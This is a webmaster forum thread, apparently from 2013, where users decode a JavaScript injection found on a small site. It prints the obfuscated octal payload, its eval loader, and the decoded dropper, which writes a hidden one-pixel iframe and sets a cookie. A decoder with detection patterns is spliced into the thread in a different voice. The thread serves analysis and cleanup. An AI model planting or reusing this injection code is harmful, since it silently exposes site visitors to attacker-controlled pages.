JavaScript and AJAX Forum

Probable injection - can anyone translate
topr8
WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member
Msg#: 4573430 posted 8:16 am on May 13, 2013 (gmt 0)

A friend of mine seems to have had some kind of JavaScript injection into their site ... I've cleaned it all up for them. I suspect the host is to blame, as they don't have a database or run any scripts except for a mailer (which is supplied by the host) ... maybe the FTP was hacked, but I doubt it.

Anyway, any idea what this means? This was the first bit; I assume they translate to characters in some way...

a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,
16,44,172,145,166,44,171,171,172,44,101,44,150,163,147,171,161,151,162,170,62,147,
166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,
53,55,77,21,16,21,16,44,171,171,172,62,167,166,147,44,101,44,53,154,170,170,164,
76,63,63,152,145,160,160,163,171,170,67,62,145,147,147,155,62,147,176,63,153,
114,165,133,106,170,166,174,62,164,154,164,53,77,21,16,44,171,171,172,62,167,
170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,
163,160,171,170,151,53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,146,
163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,171,171,172,62,167,170,175,
160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,171,
171,172,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,
53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,160,151,152,170,44,101,44,
53,65,164,174,53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,170,163,164,
44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,
161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,
53,171,171,172,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,
166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,171,171,172,140,53,
102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,
153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,171,171,172,53,
55,62,145,164,164,151,162,150,107,154,155,160,150,54,171,171,172,55,77,21,16,44,
201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,
157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,
151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,
21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,
170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,
162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,
175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,
64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,
167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,
161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,
55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,
101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,
145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,
44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,
151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,
164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,
145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,
163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,
44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,
171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,
152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,
44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,
160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,
167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,
101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,
171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,
151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,
170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,
44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,
170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,
162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,
157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,
160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,
101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,
151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,
154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,
145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,
157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,
162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,
162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,
162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,
107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,
165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,
107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,
165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,
21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","))

 

bhonda
5+ Year Member
Msg#: 4573430 posted 8:54 am on May 13, 2013 (gmt 0)

Was there any code to use it? I've just searched for a subset of this code and noticed some have this before it -

ss=eval("Str"+"ing");d=document;a=("44,152...

topr8
WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member
Msg#: 4573430 posted 9:24 am on May 13, 2013 (gmt 0)

Yes, I found a few sites had it when I did a search...

The full code was:
as pasted above followed by...

ss=eval("Str"+"ing");d=document;for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));

So the a= was at the beginning in this case.

bhonda
5+ Year Member
Msg#: 4573430 posted 11:17 am on May 13, 2013 (gmt 0)

So, the first few numbers in the array would be -

32
102
117
110

Are they HTML codes?

32 = [space]
102 = f
117 = u
110 = n
99 = c
116 = t
105 = i
111 = o
110 = n

Hmm... looks so. Anyone fancy writing a little converter for this?

astupidname
5+ Year Member
Msg#: 4573430 posted 11:44 am on May 13, 2013 (gmt 0)

That string you posted (the definition of the 'a' variable) has illegal new lines in it (a broken string), so after replacing the new lines, remove the other bits of code which appear after the definition of the 'a' variable and replace them with the following:
d=document;
for(i=0;i<a.length;i+=1){
a[i]=parseInt(a[i],8)-(7-3);
}
try{d.body++}catch(q){zz=0;}
try{zz&=2}catch(q){zz=1;}
if(!zz)if(window["document"])a = String.fromCharCode.apply(String, a);
alert(a);


The non-evaluated code as a string is then presented to you as:

function zzzfff() {
  var uuv = document.createElement('iframe');

  uuv.src = 'http://example.com';
  uuv.style.position = 'absolute';
  uuv.style.border = '0';
  uuv.style.height = '1px';
  uuv.style.width = '1px';
  uuv.style.left = '1px';
  uuv.style.top = '1px';

  if (!document.getElementById('uuv')) {
    document.write('<div id=\'uuv\'></div>');
    document.getElementById('uuv').appendChild(uuv);
  }
}
function SetCookie(cookieName,cookieValue,nDays,path) {
  var today = new Date();
  var expire = new Date();
  if (nDays==null || nDays==0) nDays=1;
  expire.setTime(today.getTime() + 3600000*24*nDays);
  document.cookie = cookieName+"="+escape(cookieValue)
    + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
  var start = document.cookie.indexOf( name + "=" );
  var len = start + name.length + 1;
  if ( ( !start ) &&
       ( name != document.cookie.substring( 0, name.length ) ) )
  {
    return null;
  }
  if ( start == -1 ) return null;
  var end = document.cookie.indexOf( ";", len );
  if ( end == -1 ) end = document.cookie.length;
  return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
  if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

  zzzfff();
  }
}

[edited by: whoisgregg at 2:05 pm (utc) on May 16, 2013]
[edit reason] sanitized url [/edit]
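The converter bhonda asked for, done the way astupidname did it by hand but without ever handing the text to eval. This is an added example, not code from the thread or from any of the posters: it splits the obfuscated literal on commas, parses each token as octal, subtracts 4 (the loader's parseInt(a[i],8)-(7-3)), and maps the results through String.fromCharCode so the script can be read instead of run. The function names, the indicator list, and the sample payload are all my own; the sample is constructed here by encoding a harmless stand-in with the same shape as the decoded dropper above, and the indicators are the features visible in that decoded script (an iframe created with createElement and sized to 1px, document.write, and the visit cookie).

```javascript
// Added example, not code from the thread: a static decoder for the
// obfuscation discussed above. The loader does parseInt(a[i], 8) - (7-3) on
// every token and feeds the result to String.fromCharCode before eval()ing
// it; decoding the same way, without the eval, lets a defender read the
// script instead of running it. Function names and the indicator list are
// my own choices, not anything from the thread.

// Decode one obfuscated literal ("44,152,171,...") into clear text.
// Whitespace and line breaks inside the literal are dropped first, so a copy
// that was wrapped for posting (the "illegal new lines" above) still decodes.
// Tokens must round-trip exactly, so "78" is rejected rather than silently
// truncated to 7 the way parseInt would do on its own.
function decodePayload(encoded, base = 8, offset = 4) {
  const tokens = encoded.replace(/\s+/g, "").split(",").filter(Boolean);
  const codes = tokens.map((tok) => {
    const n = Number.parseInt(tok, base);
    if (Number.isNaN(n) || n.toString(base) !== tok) {
      throw new Error(`token ${JSON.stringify(tok)} is not a base-${base} number`);
    }
    return n - offset;
  });
  return String.fromCharCode(...codes);
}

// Inverse transform, used only to build a constructed sample that has the
// same shape as the real payload (CR LF comes out as "21,16", the pair that
// recurs throughout the posted array).
function encodePayload(text, base = 8, offset = 4) {
  return Array.from(text, (ch) => (ch.charCodeAt(0) + offset).toString(base)).join(",");
}

// Indicators a defender would look for in the decoded text. Each pattern is
// a feature visible in the decoded script posted earlier in this thread.
const INDICATORS = [
  ["hidden-iframe", /createElement\(\s*['"]iframe['"]\s*\)/],
  ["one-pixel-frame", /style\.(?:width|height)\s*=\s*['"]1px['"]/],
  ["document-write", /document\.write\(/],
  ["visit-cookie", /SetCookie\(|document\.cookie\s*=/],
];

// Return the names of the indicators present in a decoded script.
function findIndicators(clearText) {
  return INDICATORS.filter(([, re]) => re.test(clearText)).map(([name]) => name);
}

// Constructed sample (not the thread's payload): a stand-in with the same
// structure as the decoded dropper, minus any URL. It is only decoded and
// inspected here, never executed.
const SAMPLE_CLEAR =
  " function zzzfff() {\r\n var uuv = document.createElement('iframe');\r\n" +
  " uuv.style.width = '1px';\r\n}\r\nzzzfff();";
const SAMPLE_ENCODED = encodePayload(SAMPLE_CLEAR);

// Stand-alone run: decode the sample and report what it contains.
console.log(decodePayload(SAMPLE_ENCODED));
console.log("indicators:", findIndicators(decodePayload(SAMPLE_ENCODED)).join(", "));
```

Run it under Node with the real "a" literal pasted in place of SAMPLE_ENCODED to get the same cleartext astupidname posted; the first nine tokens of the posted array, "44,152,171,162,147,170,155,163,162", decode to " function", matching bhonda's 32, 102, 117, 110 above. Any remaining URL in the output is then visible as text, which is safer than letting alert() or eval() see the result.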

bhonda
5+ Year Member
Msg#: 4573430 posted 11:46 am on May 13, 2013 (gmt 0)

Man, you got there just before I did!

Might be worth removing the URL.

topr8
WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member
Msg#: 4573430 posted 5:25 am on May 18, 2013 (gmt 0)

Thanks for the replies - I thought the thread had been deleted!

lucy24
WebmasterWorld Senior Member, Top Contributor of All Time, Top Contributors Of The Month
Msg#: 4573430 posted 7:09 am on May 18, 2013 (gmt 0)

>>as pasted above followed by...

Aha, the missing link. If you take the original numbers at face value it's garbage:
,˜«ą“Ș›Łą,°°°˜˜˜
et cetera. (The number that turns into 32, i.e. space, starts out as 44 which happens to be a comma.)

>>illegal new lines

I think they were inserted by a moderator because the original post would otherwise have circled the earth :)

jimbeetle
WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member
Msg#: 4573430 posted 10:17 pm on May 18, 2013 (gmt 0)

>>i suspect the host is to blame as they don't have a database or run any scripts except for a mailer (which is supplied by the host) ... maybe the ftp was hacked but i doubt it

The host doesn't have to be the one to blame, and the site doesn't have to run a database or any scripts. And *don't* doubt that the FTP was hacked.

Have your friend scrub the local machine just in case a keylogger was downloaded. This is a *very* common technique for the bad guys to capture passwords. I was hit a few years ago.

>>i've cleaned it all up for them

Are you sure? Did you just clean the files or did you find the file the bad guys might have left behind?

topr8
WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member
Msg#: 4573430 posted 2:37 pm on May 19, 2013 (gmt 0)

>>I think they were inserted by a moderator because the original post would otherwise have circled the earth

Actually yes, I made the line breaks before posting, as I realised it would have stretched on forever!

>>Are you sure?

Well, I did my best ... deleted all the files on the server from their filespace.
Then I manually checked every file (there were not that many, only around 50, and they were only plain HTML) and removed all the 'injected' lines of code.
I also suggested that they reinstall Windows on their local machine, which they said they did; they live in a different town to me, and I wasn't going to drive over and do it for them!

But I appreciate your point, Jim; this is not my area of expertise and it is entirely possible that I may have missed something. So far, though, the injection hasn't recurred.

Thanks for everyone's input, much appreciated.

So I can see the code sets up a presumably malicious iframe, which would have tried to run some kind of script on the site visitors' machines... I guess this is the common purpose of these types of injection attacks.

jimbeetle
WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member
Msg#: 4573430 posted 3:31 pm on May 21, 2013 (gmt 0)

It's not my area of expertise at all, either, just that one very painful experience.

I'm assuming it's shared hosting so it might be best to contact the host so it can clean any spurious files off the server as from what I shakily understand there can be cross-domain contamination.

topr8
WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member
Msg#: 4573430 posted 5:22 pm on May 21, 2013 (gmt 0)

I figured it was probably an infection at the host level, but the host was adamant it wasn't them - there's no knowing if that is true or not, though.

I advised them to move hosts anyway just in case; it seemed the obvious thing to do.

It made me glad of my own set-up! A dedicated server, and a hardware firewall which only allows FTP, SSH and any admin page access from my own IP address.

WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved